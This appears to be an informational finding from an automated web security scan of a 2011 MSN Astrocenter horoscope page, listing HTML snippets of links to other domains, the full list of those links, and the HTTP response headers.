<li><a href="http://msn.foxsports.com/cbk">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl">NFL</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/video">Video</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li class="first"><a href="http://www.delish.com/">Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV">Travel</a>
...[SNIP]...
<li>
       <a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li>
       <a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li>
       <a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a>
...[SNIP]...
<li>
       <a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li>
       <a href="http://www.bing.com/maps/default.aspx?wip=2&v=2&rtp=~&FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li>
       <a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo">
                               <a href="http://www.bing.com/search?FORM=A18">Bing</a>
...[SNIP]...
<li id="msg" class="last"><a href="http://download.live.com/?sku=messenger">Messenger</a>
...[SNIP]...
<div><a id="wslink" href="http://www.bing.com/search?form=A18">Search the web</a>
...[SNIP]...
</strong>
                       <a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<div>
<img src="http://msnportalastrology.112.2O7.net/b/ss/msnportalastrology/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="special" ><a class="special" href=http://www.astrocenter.com/msn/HPChartsAndReports.aspx?Af=-1000>Charts & Reports</a>
...[SNIP]...
<li ><a href=http://www.psychiccenter.com/TelephonyMSN/Phone/Welcome.aspx?Af=-1000>PsychicCenter</a>
...[SNIP]...
<a href="javascript:centeredPopup('popup/WhatsIncluded.aspx', 470, 330, 'scrollbars=0,status=0,toolbar=0,location=0');"><img src="http://www.astrocenter.com/us/images/info.gif" align="absmiddle" style="display:inline;width:11px;height:11px" border="0" alt="More Information about Personalized Horoscopes"></a>
...[SNIP]...
<div class="unpDottedLine"><img src="http://www.astrocenter.com/us/images/spacer.gif" width="296" height="1" border="0" title="" alt=""></div>
...[SNIP]...
<a href="http://astrocenter.astrology.redacted/msn/Default.aspx?Sign=0&Af=-1000"><img src="http://www.astrocenter.com/us/images/horoscopeModule/UnpersSign_0.png" alt="Aries" title="Aries" border="0">Aries</a>
...[SNIP]...
<a href="http://astrocenter.astrology.redacted/msn/Default.aspx?Sign=1&Af=-1000"><img src="http://www.astrocenter.com/us/images/horoscopeModule/UnpersSign_1.png" alt="Taurus" title="Taurus" border="0">Taurus</a>
...[SNIP]...
<a href="http://astrocenter.astrology.redacted/msn/Default.aspx?Sign=2&Af=-1000"><img src="http://www.astrocenter.com/us/images/horoscopeModule/UnpersSign_2.png" alt="Gemini" title="Gemini" border="0">Gemini</a>
...[SNIP]...
<a href="http://astrocenter.astrology.redacted/msn/Default.aspx?Sign=3&Af=-1000"><img src="http://www.astrocenter.com/us/images/horoscopeModule/UnpersSign_3.png" alt="Cancer" title="Cancer" border="0">Cancer</a>
...[SNIP]...
<a href="http://astrocenter.astrology.redacted/msn/Default.aspx?Sign=4&Af=-1000"><img src="http://www.astrocenter.com/us/images/horoscopeModule/UnpersSign_4.png" alt="Leo" title="Leo" border="0">Leo</a>
...[SNIP]...
<a href="http://astrocenter.astrology.redacted/msn/Default.aspx?Sign=5&Af=-1000"><img src="http://www.astrocenter.com/us/images/horoscopeModule/UnpersSign_5.png" alt="Virgo" title="Virgo" border="0">Virgo</a>
...[SNIP]...
<a href="http://astrocenter.astrology.redacted/msn/Default.aspx?Sign=6&Af=-1000"><img src="http://www.astrocenter.com/us/images/horoscopeModule/UnpersSign_6.png" alt="Libra" title="Libra" border="0">Libra</a>
...[SNIP]...
<a href="http://astrocenter.astrology.redacted/msn/Default.aspx?Sign=7&Af=-1000"><img src="http://www.astrocenter.com/us/images/horoscopeModule/UnpersSign_7.png" alt="Scorpio" title="Scorpio" border="0">Scorpio</a>
...[SNIP]...
<a href="http://astrocenter.astrology.redacted/msn/Default.aspx?Sign=8&Af=-1000"><img src="http://www.astrocenter.com/us/images/horoscopeModule/UnpersSign_8.png" alt="Sagittarius" title="Sagittarius" border="0">Sagittarius</a>
...[SNIP]...
<a href="http://astrocenter.astrology.redacted/msn/Default.aspx?Sign=9&Af=-1000"><img src="http://www.astrocenter.com/us/images/horoscopeModule/UnpersSign_9.png" alt="Capricorn" title="Capricorn" border="0">Capricorn</a>
...[SNIP]...
<a href="http://astrocenter.astrology.redacted/msn/Default.aspx?Sign=10&Af=-1000"><img src="http://www.astrocenter.com/us/images/horoscopeModule/UnpersSign_10.png" alt="Aquarius" title="Aquarius" border="0">Aquarius</a>
...[SNIP]...
<a href="http://astrocenter.astrology.redacted/msn/Default.aspx?Sign=11&Af=-1000"><img src="http://www.astrocenter.com/us/images/horoscopeModule/UnpersSign_11.png" alt="Pisces" title="Pisces" border="0">Pisces</a>
...[SNIP]...
<h2><a class="moduleTitleViolet" style="font-size:11px;" href="http://www.astrocenter.com/msn/HPChartsAndReports.aspx?Af=-1000">What's New</a>
...[SNIP]...
<div style="padding:5px 10px 5px 10px">This website is <a href="http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash" target="adobeUpgrade"><u>even better</u></a> with the latest version of Adobe Flash Player. Plus, it's FREE. Get it <a href="http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash" target="adobeUpgrade"><u>
...[SNIP]...
<noscript>
   <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,0,0" width="302" height="337" id="m5L2" align="middle">
   <param name="allowScriptAccess" value="sameDomain" />
...[SNIP]...
<a href="http://astrocenter.astrology.redacted/msn/DeptLove.aspx?Af=-1000"><img src="http://www.astrocenter.com/us/images/horoscopeModule/icon_love.png" class="icn" title="Love Horoscopes" alt="Love Horoscopes"></a>
...[SNIP]...
<a href="http://astrocenter.astrology.redacted/msn/DeptNumerology.aspx?Af=-1000"><img src="http://www.astrocenter.com/us/images/horoscopeModule/icon_numerology.png" class="icn" title="Numerology" alt="Numerology"></a>
...[SNIP]...
<a href="http://astrocenter.astrology.redacted/msn/DeptTarot.aspx?Af=-1000"><img src="http://www.astrocenter.com/us/images/horoscopeModule/icon_tarot.png" class="icn" title="Daily Tarot" alt="Daily Tarot"></a>
...[SNIP]...
<a href="http://astrocenter.astrology.redacted/msn/DeptChin.aspx?Af=-1000"><img src="http://www.astrocenter.com/us/images/horoscopeModule/icon_Chinese.png" class="icn" title="Chinese Horoscopes" alt="Chinese Horoscopes"></a>
...[SNIP]...
<h2><a class="t8wht" href="http://www.astrocenter.com/msn/HPChartsAndReports.aspx?Af=-1000"><b>
...[SNIP]...
<a href='buyStEdCh2K2.aspx'><img src="http://www.astrocenter.com/us/images/_sh/pict_60/pict_StEdCh2K2_60.png" alt="2011 Chinese Horoscope" title="2011 Chinese Horoscope" width="60" border="0"></a>
...[SNIP]...
<h2><a href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdTTL&Af=-1000" class="moduleTitle" style="font-size:12px; text-transform:uppercase;">2011 Love Tarot - <font style="color:red;">
...[SNIP]...
<div class="ctrImg1"><a href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdTTL&Af=-1000"><img src="http://www.astrocenter.com/us/images/_sh/pict_120/pict_StEdTTL_120.png" width="120" height="120" alt="Stack your deck for love!" title="Stack your deck for love!" border="0"></a></div>
       <div class="standard11" style="text-align:left; height:120px;"><a class="prodDesc" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdTTL&Af=-1000">This 13-card reading illustrates the romantic atmosphere of each month, as well as the end result! With your 2011 Love Tarot Reading, you'll know how to get what you want, whether it's a hot fling or a
...[SNIP]...
<div style="text-align:right;"><a class="prodClick" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdTTL&Af=-1000">Get your reading »</a>
...[SNIP]...
<a href="http://astrocenter.astrology.redacted/msn/buyStEdMo.aspx?Af=-1000"><img src="http://www.astrocenter.com/us/images/_sh/pict_misc/pict_gen_DidYouKnow_90x110.jpg" width="90" height="110" border="0" title="Did You Know? - Your Inner Child and Astrology" alt="Did You Know? - Your Inner Child and Astrology"></a>
...[SNIP]...
<li><a class="prodClick12" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdAP&Af=-1000">Get your AstroProfile!</a>
...[SNIP]...
<h2><a href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdVY&Af=-1000" class="moduleTitle" style="font-size:12px; text-transform:uppercase;">2011 Vedic Forecast - <font style="color:red;">
...[SNIP]...
<div class="ctrImg1"><a href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdVY&Af=-1000"><img src="http://www.astrocenter.com/us/images/_sh/pict_120/pict_StEdVY_120.png" width="120" height="120" alt="Bring your desires to life!" title="Bring your desires to life!" border="0"></a></div>
       <div class="standard11" style="text-align:left; height:120px;"><a class="prodDesc" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdVY&Af=-1000">Try a unique take on your future! Use the ancient system of Vedic astrology to gain insight with your 2011 Vedic Horoscope! This report takes a holistic approach to integrate your higher, spiritual asp
...[SNIP]...
<div style="text-align:right;"><a class="prodClick" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdVY&Af=-1000">Get your report »</a>
...[SNIP]...
<a HREF="http://astrocenter.astrology.redacted/msn/ArticleAstrologyHomeV2.aspx?Af=-1000"><img SRC="http://www.astrocenter.com/us/images/Articles/ast_20100125_145.jpg" WIDTH="145" HEIGHT="232" border="1" alt="5 Myths About Love" title="5 Myths About Love"></img>
...[SNIP]...
<h2><a href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdLS&Af=-1000" class="moduleTitle" style="font-size:12px; text-transform:uppercase;">Love Score</a>
...[SNIP]...
<div class="ctrImg1"><a href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdLS&Af=-1000"><img src="http://www.astrocenter.com/us/images/_sh/pict_120/pict_StEdLS_120.png" width="120" height="120" alt="How do you rate with your mate?" title="How do you rate with your mate?" border="0"></a></div>
       <div class="standard11" style="text-align:left; height:120px;"><a class="prodDesc" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdLS&Af=-1000">This unique synastry report rates your relationship potential based on seven key factors. It's fun, easy-to-read, and accurate. Love isn't logical, but it makes a lot more sense when you know the score
...[SNIP]...
<div style="text-align:right;"><a class="prodClick" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdLS&Af=-1000">Get your report »</a>
...[SNIP]...
<a href="http://astrocenter.astrology.redacted/msn/HPDream.aspx?Af=-1000#FeaturedDream"><img src="http://www.astrocenter.com/us/images/_sh/pict_120/pict_gen_FeaturedDream_120.png" width="120" height="120" border="0" title="Featured Dream Interpretation" alt="Featured Dream Interpretation"></a>
...[SNIP]...
<h2><a href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdFr2K11&Af=-1000" class="moduleTitle" style="font-size:12px;">In-depth Insight: 2011 Horoscope - <font style="color:red;">
...[SNIP]...
<div class="ctrImg1"><a href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdFr2K11&Af=-1000"><img src="http://www.astrocenter.com/us/images/_sh/pict_145/pict_StEdFr2K2_145.png" width="145" height="232" alt="" title="" border="0"></a></div>
       <div class="standard11" style="text-align:left;"><a class="prodDesc" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdFr2K11&Af=-1000">Get everything you want with your 2011 Horoscope! This year, we're giving you more of what you need to get your happily-ever-after ending! All About You is your must-have base report. Add one of the lo
...[SNIP]...
<div style="text-align:right;"><a class="prodClick" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdFr2K11&Af=-1000">Read More</a>
...[SNIP]...
<li><a class="prodClick12" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdFr2k11&Af=-1000" title=""><b>
...[SNIP]...
<li><a class="prodClick12" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdCh2k2&Af=-1000" title=""><b>
...[SNIP]...
<li><a class="prodClick12" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdFrMo&Af=-1000" alt="" title="">February Horoscope</a>
...[SNIP]...
<li><a class="prodClick12" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdFrMoRo&Af=-1000" alt="" title="">February LoveScope</a>
...[SNIP]...
<li><a class="prodClick12" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdMW&Af=-1000" alt="" title="">Make a Wish Tarot</a>
...[SNIP]...
<li><a class="prodClick12" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdYN&Af=-1000" alt="" title="">Yes/No Tarot</a>
...[SNIP]...
<li><a class="prodClick12" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdST&Af=-1000" alt="" title="">Soul Mate Tarot</a>
...[SNIP]...
<li><a class="prodClick12" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdKS&Af=-1000" alt="" title="">King Solomon</a>
...[SNIP]...
<li><a class="prodClick12" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdEH&Af=-1000" alt="" title="">Eye of Horus</a>
...[SNIP]...
<li><a class="prodClick12" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdMLT&Af=-1000" alt="" title="">Magic Love Tarot</a>
...[SNIP]...
</div><a href="http://store.astrocenter.com/msn/store/buy/default.asp?De=STEDGT&Af=-1000"><img src="http://www.astrocenter.com/us/images/_sh/pict_60/pict_STEDGT_60.png" width="60" height="60" alt="" title="" border="0"></a></td>
       <td style="padding-left:10px"><a class="prodTitle" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=STEDGT&Af=-1000">Gold Tarot</a><br><a class="prodDesc" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=STEDGT&Af=-1000">Worried about money? Who isn't? This Tarot reading helps you uncover your personal path to real prosperity!</a>
...[SNIP]...
<div style="text-align:right;"><a class="prodClick" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=STEDGT&Af=-1000">More</a>
...[SNIP]...
</div><a href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdMT&Af=-1000"><img src="http://www.astrocenter.com/us/images/_sh/pict_60/pict_StEdMT_60.png" width="60" height="60" alt="More than your ordinary Tarot..." title="More than your ordinary Tarot..." border="0"></a></td>
       <td style="padding-left:10px"><a class="prodTitle" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdMT&Af=-1000">Personal Star <font style='font-size:10px;'>
...[SNIP]...
<br><a class="prodDesc" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdMT&Af=-1000">
       This ancient Tarot technique and beautiful, expanded Tarot deck shine the light of your personal star on your question!</a>
...[SNIP]...
<div style="text-align:right;"><a class="prodClick" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdMT&Af=-1000">More</a>
...[SNIP]...
</div><a href="http://store.astrocenter.com/msn/store/buy/default.asp?De=STEDST&Af=-1000"><img src="http://www.astrocenter.com/us/images/_sh/pict_60/pict_STEDST_60.png" width="60" height="60" alt="It takes two to tango..." title="It takes two to tango..." border="0"></a></td>
       <td style="padding-left:10px"><a class="prodTitle" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=STEDST&Af=-1000">Soul Mate Tarot</a><br><a class="prodDesc" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=STEDST&Af=-1000">Be a double agent - get two perspectives of your love relationship to find out how well you mesh with your Soul Mate Tarot!</a>
...[SNIP]...
<div style="text-align:right;"><a class="prodClick" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=STEDST&Af=-1000">More</a>
...[SNIP]...
<td class="headMod"><a target="phoneSite" href="http://www.psychiccenter.com/TelephonyMSN/Phone/Welcome.aspx?Af=-1000"><font color="#0085aa">
...[SNIP]...
<td><a target="phoneSite" href="http://www.psychiccenter.com/TelephonyMSN/Phone/Welcome.aspx?Theme=Love&Af=-1000"><img src="http://www.astrocenter.com/us/images/_sh/pict_60/pict_StTy5_Love_60.png" border="0" width="60" height="60" alt="Talk with a Psychic Advisor" title="Get 5 minutes free!"></a></td>
       <td style="padding-left:10px"><a target="phoneSite" href="http://www.psychiccenter.com/TelephonyMSN/Phone/Welcome.aspx?Theme=Love&Af=-1000" class="prodTitle">Psychic Love Reading</a><br><a target="phoneSite" href="http://www.psychiccenter.com/TelephonyMSN/Phone/Welcome.aspx?Theme=Love&Af=-1000" class="prodDesc">
       A fabulous complement to any of our love products. Find out what the psychics see for your love future.</a>
...[SNIP]...
<div style="text-align:right;"><a target="phoneSite" href="http://www.psychiccenter.com/TelephonyMSN/Phone/Welcome.aspx?Theme=Love&Af=-1000" class="prodClick">More</a>
...[SNIP]...
<td class="headMod">What is <a target="phoneSite" class="standardL11" href="http://www.psychiccenter.com/TelephonyMSN/Phone/Welcome.aspx?Af=-1000"><b>
...[SNIP]...
</div>
           1-866-MY-ASTRO is Astrocenter's live advice phone service, which is committed to making quality <a href="http://www.psychiccenter.com/TelephonyMSN/Phone/Welcome.aspx?Af=-1000">psychic reading</a>
...[SNIP]...
<br>

           Our advisors are highly skilled <a href="http://www.psychiccenter.com/TelephonyMSN/Phone/Welcome.aspx?Af=-1000">psychics</a>
...[SNIP]...
<b>Why <a href="http://www.psychiccenter.com/TelephonyMSN/Phone/Welcome.aspx?Af=-1000" style="color:#FF9944; text-decoration:none">psychic reading</a>
...[SNIP]...
<br>
           Calling a <a href="http://www.psychiccenter.com/TelephonyMSN/Phone/Welcome.aspx?Af=-1000">psychic</a> advisor for the first time can be overwhelming. Please see below how you may benefit from a <a href="http://www.psychiccenter.com/TelephonyMSN/Phone/Welcome.aspx?Af=-1000">psychic reading</a>
...[SNIP]...
<br>
           When it comes to love, sometimes we need support to keep going. Whether you are used to turn to astrology or the Tarot for advice, or prefer a <a href="http://www.psychiccenter.com/TelephonyMSN/Phone/Welcome.aspx?Af=-1000">psychic</a>
...[SNIP]...
<br>
           Feel fenced in to reach your career potential? our advisors have experience in many fields and their goal is to share their insight. Contact an Astrocenter <a href="http://www.psychiccenter.com/TelephonyMSN/Phone/Welcome.aspx?Af=-1000">psychic</a> and see what a <a href="http://www.psychiccenter.com/TelephonyMSN/Phone/Welcome.aspx?Af=-1000">psychic reading</a>
...[SNIP]...
<b><a href="http://www.psychiccenter.com/TelephonyMSN/Phone/Welcome.aspx?Af=-1000" style="color:#FF9944; text-decoration:none">Tarot reading</a>
...[SNIP]...
<br>
           <a href="http://www.psychiccenter.com/TelephonyMSN/Phone/Welcome.aspx?Af=-1000">A Tarot reading</a>
...[SNIP]...
<br>
           Whatever your particular question or personal situation, there's an Astrocenter <a href="http://www.psychiccenter.com/TelephonyMSN/Phone/Welcome.aspx?Af=-1000">psychic</a> to guide you. Some <a href="http://www.psychiccenter.com/TelephonyMSN/Phone/Welcome.aspx?Af=-1000">psychics</a>
...[SNIP]...
</a>. Understand how you can use the powerful influences in your life and experience a <a href="http://www.psychiccenter.com/TelephonyMSN/Phone/Welcome.aspx?Af=-1000">psychic reading</a>
...[SNIP]...
<br>
   It's FREE! Get it <a href="http://www.adobe.com/" target="adobeUpgrade"><u>
...[SNIP]...
<noscript>
   <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,0,0" width="300" height="250" id="hMod" align="middle">
   <param name="allowScriptAccess" value="always" />
...[SNIP]...
<td><img SRC="http://www.astrocenter.com/us/images/_sh/elements/bulletSq7x7_085299.gif" WIDTH="7" HEIGHT="7" ALT="bullet" TITLE="bullet" BORDER="0"></img>
...[SNIP]...
<td><img SRC="http://www.astrocenter.com/us/images/_sh/elements/bulletSq7x7_085299.gif" WIDTH="7" HEIGHT="7" ALT="bullet" TITLE="bullet" BORDER="0"></img>
...[SNIP]...
<td><img SRC="http://www.astrocenter.com/us/images/_sh/elements/bulletSq7x7_085299.gif" WIDTH="7" HEIGHT="7" ALT="bullet" TITLE="bullet" BORDER="0"></img>
...[SNIP]...
<td><img SRC="http://www.astrocenter.com/us/images/_sh/elements/bulletSq7x7_085299.gif" WIDTH="7" HEIGHT="7" ALT="bullet" TITLE="bullet" BORDER="0"></img>
...[SNIP]...
<td><img SRC="http://www.astrocenter.com/us/images/_sh/elements/bulletSq7x7_085299.gif" WIDTH="7" HEIGHT="7" ALT="bullet" TITLE="bullet" BORDER="0"></img>
...[SNIP]...
<td><a href="http://www.bing.com/search?FORM=A1&q=summer+sandals+2010&src=IE-SearchBox" class="T11TahBk">Search: Summer Sandals</a>
...[SNIP]...
<td width="80" style="padding-left:10px;padding-right:10px;"><a href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdEm&Af=-1000"><img src="http://www.astrocenter.com/us/images/_sh/pict_misc/pict_StEdFreeEmailSub_70.png" width="70" height="70" border="0" title="Free Horoscope and Tarot Newsletters" alt="Free Horoscope and Tarot Newsletters"></a>
...[SNIP]...
<td width="80" style="padding-right:5px;padding-top:8px;" valign="top">
           .. <a target=_blank href="http://www.astrocenter.com/us/PrivacyPopup.aspx" class="prodClick" title="Astrocenter's Privacy Policy">Privacy</a>
...[SNIP]...
<div class="afwrapper standard11"><a href="//privacy-policy.truste.com/click-with-confidence/eusafe/en/www.astrocenter.com/seal_s" title="TRUSTe European Safe Harbor certification" target="_blank"><img align="right" style="border: none; margin-top: -10px" src="//privacy-policy.truste.com/certified-seal/eusafe/en/www.astrocenter.com/seal_s.png" alt="TRUSTe European Safe Harbor certification"/></a>
...[SNIP]...
</a> | <a class="standardL11" href="http://www.horoscope.com"><font color=black>
...[SNIP]...
</a> content Copyright 1999-2011 <a class="standardL11" href="http://www.horoscope.com"><font color=black>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">MSN Privacy</a>
...[SNIP]...

<script type="text/javascript" src="http://astrocenter.msn.us.intellitxt.com/ast/js/msn/astrocenter.msn_cs.js"></script>
...[SNIP]...

22.41. http://astrocenter.astrology.redacted/msn/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://astrocenter.astrology.redacted
Path:	/msn/Default.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://astrocenter.astrology.redacted/msn/Default.aspx?When=0&Af=-1000&VS&Af=-1000

The response contains the following links to other domains:

http://astrocenter.msn.us.intellitxt.com/ast/js/msn/astrocenter.msn_cs.js
http://download.live.com/?sku=messenger
http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
http://go.microsoft.com/fwlink/?LinkId=74170
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cbk
http://msn.foxsports.com/cfb
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video
http://msn.whitepages.com/
http://msnportalastrology.112.2o7.net/b/ss/msnportalastrology/1/H.1--NS/0
http://privacy-policy.truste.com/certified-seal/eusafe/en/www.astrocenter.com/seal_s.png
http://privacy-policy.truste.com/click-with-confidence/eusafe/en/www.astrocenter.com/seal_s
http://store.astrocenter.com/msn/store/buy/default.asp?De=STEDST&Af=-1000
http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdAP&Af=-1000
http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdCh2k2&Af=-1000
http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdEH&Af=-1000
http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdEm&Af=-1000
http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdFr2K11&Af=-1000
http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdFr2k11&Af=-1000
http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdFrMo&Af=-1000
http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdFrMoRo&Af=-1000
http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdKS&Af=-1000
http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdLS&Af=-1000
http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdMLT&Af=-1000
http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdMW&Af=-1000
http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdRU&Af=-1000
http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdST&Af=-1000
http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdTTL&Af=-1000
http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdVY&Af=-1000
http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdYN&Af=-1000
http://video.msnbc.com/
http://www.adobe.com/
http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash
http://www.astrocenter.com/msn/HPChartsAndReports.aspx?Af=-1000
http://www.astrocenter.com/us/PrivacyPopup.aspx
http://www.astrocenter.com/us/center.ico
http://www.astrocenter.com/us/images/Articles/ast_20100125_145.jpg
http://www.astrocenter.com/us/images/PE.png
http://www.astrocenter.com/us/images/_sh/elements/bulletSq7x7_085299.gif
http://www.astrocenter.com/us/images/_sh/pict_120/pict_StEdLS_120.png
http://www.astrocenter.com/us/images/_sh/pict_120/pict_StEdTTL_120.png
http://www.astrocenter.com/us/images/_sh/pict_120/pict_StEdVY_120.png
http://www.astrocenter.com/us/images/_sh/pict_120/pict_gen_FeaturedDream_120.png
http://www.astrocenter.com/us/images/_sh/pict_145/pict_StEdFr2K2_145.png
http://www.astrocenter.com/us/images/_sh/pict_60/pict_STEDST_60.png
http://www.astrocenter.com/us/images/_sh/pict_60/pict_StEdCh2K2_60.png
http://www.astrocenter.com/us/images/_sh/pict_60/pict_StEdLS_60.png
http://www.astrocenter.com/us/images/_sh/pict_60/pict_StEdRU_60.png
http://www.astrocenter.com/us/images/_sh/pict_60/pict_StTy5_Love_60.png
http://www.astrocenter.com/us/images/_sh/pict_misc/pict_StEdFreeEmailSub_70.png
http://www.astrocenter.com/us/images/_sh/pict_misc/pict_gen_DidYouKnow_90x110.jpg
http://www.astrocenter.com/us/images/horoscopeModule/UnpersSign_0.png
http://www.astrocenter.com/us/images/horoscopeModule/UnpersSign_1.png
http://www.astrocenter.com/us/images/horoscopeModule/UnpersSign_10.png
http://www.astrocenter.com/us/images/horoscopeModule/UnpersSign_11.png
http://www.astrocenter.com/us/images/horoscopeModule/UnpersSign_2.png
http://www.astrocenter.com/us/images/horoscopeModule/UnpersSign_3.png
http://www.astrocenter.com/us/images/horoscopeModule/UnpersSign_4.png
http://www.astrocenter.com/us/images/horoscopeModule/UnpersSign_5.png
http://www.astrocenter.com/us/images/horoscopeModule/UnpersSign_6.png
http://www.astrocenter.com/us/images/horoscopeModule/UnpersSign_7.png
http://www.astrocenter.com/us/images/horoscopeModule/UnpersSign_8.png
http://www.astrocenter.com/us/images/horoscopeModule/UnpersSign_9.png
http://www.astrocenter.com/us/images/horoscopeModule/icon_Chinese.png
http://www.astrocenter.com/us/images/horoscopeModule/icon_love.png
http://www.astrocenter.com/us/images/horoscopeModule/icon_numerology.png
http://www.astrocenter.com/us/images/horoscopeModule/icon_tarot.png
http://www.astrocenter.com/us/images/info.gif
http://www.astrocenter.com/us/images/spacer.gif
http://www.astrocenter.com/us/js/center-horoscope.js
http://www.bing.com/maps/default.aspx?wip=2&v=2&rtp=~&FORM=MSNNAV
http://www.bing.com/search?FORM=A1&q=summer+sandals+2010&src=IE-SearchBox
http://www.bing.com/search?FORM=A18
http://www.bing.com/search?form=A18
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.delish.com/
http://www.horoscope.com/
http://www.myhomeredacted/
http://www.psychiccenter.com/TelephonyMSN/Phone/Welcome.aspx?Af=-1000
http://www.psychiccenter.com/TelephonyMSN/Phone/Welcome.aspx?Theme=Love&Af=-1000
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 92523
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:45:38 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Fre
...[SNIP]...
<meta name="robots" CONTENT="index,follow,all">
<link rel="shortcut icon" href="http://www.astrocenter.com/us/center.ico">
